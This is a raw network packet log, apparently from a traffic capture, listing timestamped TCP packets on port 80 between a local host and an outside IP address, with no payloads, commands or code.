                                                                                                                                                                                                Dec 13, 2024 08:18:51.672324896 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.672405005 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.672440052 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.673541069 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.673619986 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.673655033 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.674730062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.674798965 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.674834013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.675905943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.675976038 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.675986052 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.677114964 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.677181005 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.677217007 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.678318977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.678390980 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.678406954 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.679533958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.679593086 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.679620981 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.680685997 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.680752993 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.680809975 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.681870937 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.681941986 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.681973934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.683059931 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.683125973 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.683191061 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.684313059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.684372902 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.684428930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.685481071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.685537100 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.685652971 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.686646938 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.686702013 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.686737061 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.687841892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.687897921 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.687930107 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.689059019 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.689120054 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.689130068 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.690217972 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.690288067 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.690321922 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.691418886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.691451073 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.691492081 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.692604065 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.692697048 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.692702055 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.693815947 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.693892002 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.693897963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.694999933 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.695072889 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.695116997 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.696242094 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.696314096 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.696362019 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.697410107 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.697483063 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.697494030 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.698585033 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.698657990 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.698689938 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.699816942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.699906111 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.699920893 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.700972080 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.701040030 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.701064110 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.702172041 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.702239990 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.702275038 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.703375101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.703439951 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.703495979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.704622030 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.704690933 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.704731941 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.705811977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.705868959 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.705924988 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.706940889 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.707029104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.707029104 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.761940956 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.837819099 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.837868929 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.837907076 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.838020086 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.838125944 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.838172913 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.839134932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.839189053 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.839303970 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.840178967 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.840297937 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.840390921 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.841450930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.841531992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.841634989 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.842575073 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.842776060 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.842869997 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.843797922 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.843854904 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.843967915 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.845403910 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.845443964 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.845549107 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.846129894 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.846242905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.846334934 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.847346067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.847450972 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.847563982 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.848511934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.848639965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.848733902 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.849725008 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.849826097 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.849934101 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.850955963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.851039886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.851144075 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.852124929 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.852212906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.852314949 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.853317022 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.853420973 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.853521109 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.854512930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.854635000 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.854738951 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.855715990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.855855942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.855952024 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.856895924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.856937885 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.857033968 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.858104944 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.858181000 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.858277082 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.859288931 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.859898090 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.860012054 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.860455036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.860599041 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.860692024 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.861675024 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.862193108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.862294912 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.862839937 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.862974882 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.863068104 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.864033937 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.864141941 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.864234924 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.865236044 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.865360022 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.865447998 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.866453886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.866574049 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.866681099 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.867659092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.867727041 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.867822886 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.868834019 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.868937016 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.869038105 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.870029926 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.870125055 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.870218992 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.871216059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.871308088 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.871393919 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.872397900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.872503996 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.872592926 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.873590946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.873692036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.873779058 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.874779940 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.874919891 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.875017881 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.875984907 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.876113892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.876204967 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.877183914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.877284050 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.877379894 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.878437996 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.878506899 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.878601074 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.879553080 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.879653931 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.879757881 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.880754948 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.880880117 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.881230116 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.882050991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.882077932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.882198095 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.883127928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.883240938 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.883325100 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.884376049 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.884475946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.884563923 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.885546923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.885680914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.885765076 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.886707067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.886806965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.886924028 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.887907028 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.887969971 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.888062000 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.889122963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.889250040 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.889328957 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.890305042 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.890413046 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.890501022 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.891505957 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.891606092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.891702890 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.892683983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.892777920 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.892860889 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.893903971 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.894004107 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.894085884 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.895076990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.895203114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.895286083 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.896285057 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.896389961 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.896482944 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.897494078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.897612095 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.897695065 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.898726940 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.898890018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.898981094 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.899915934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.949376106 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.029433012 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.029465914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.029653072 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.029900074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.029963970 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.029999971 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.031094074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.031137943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.031222105 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.032303095 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.032409906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.032489061 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.033535004 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.033565044 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.033634901 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.034718037 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.034768105 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.034847975 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.035912037 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.035968065 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.036047935 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.037062883 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.037144899 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.037265062 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.038242102 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.038336039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.038417101 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.039429903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.039539099 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.039637089 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.040685892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.040867090 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.040945053 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.041846991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.042009115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.042089939 CET4972680192.168.2.11185.81.68.147
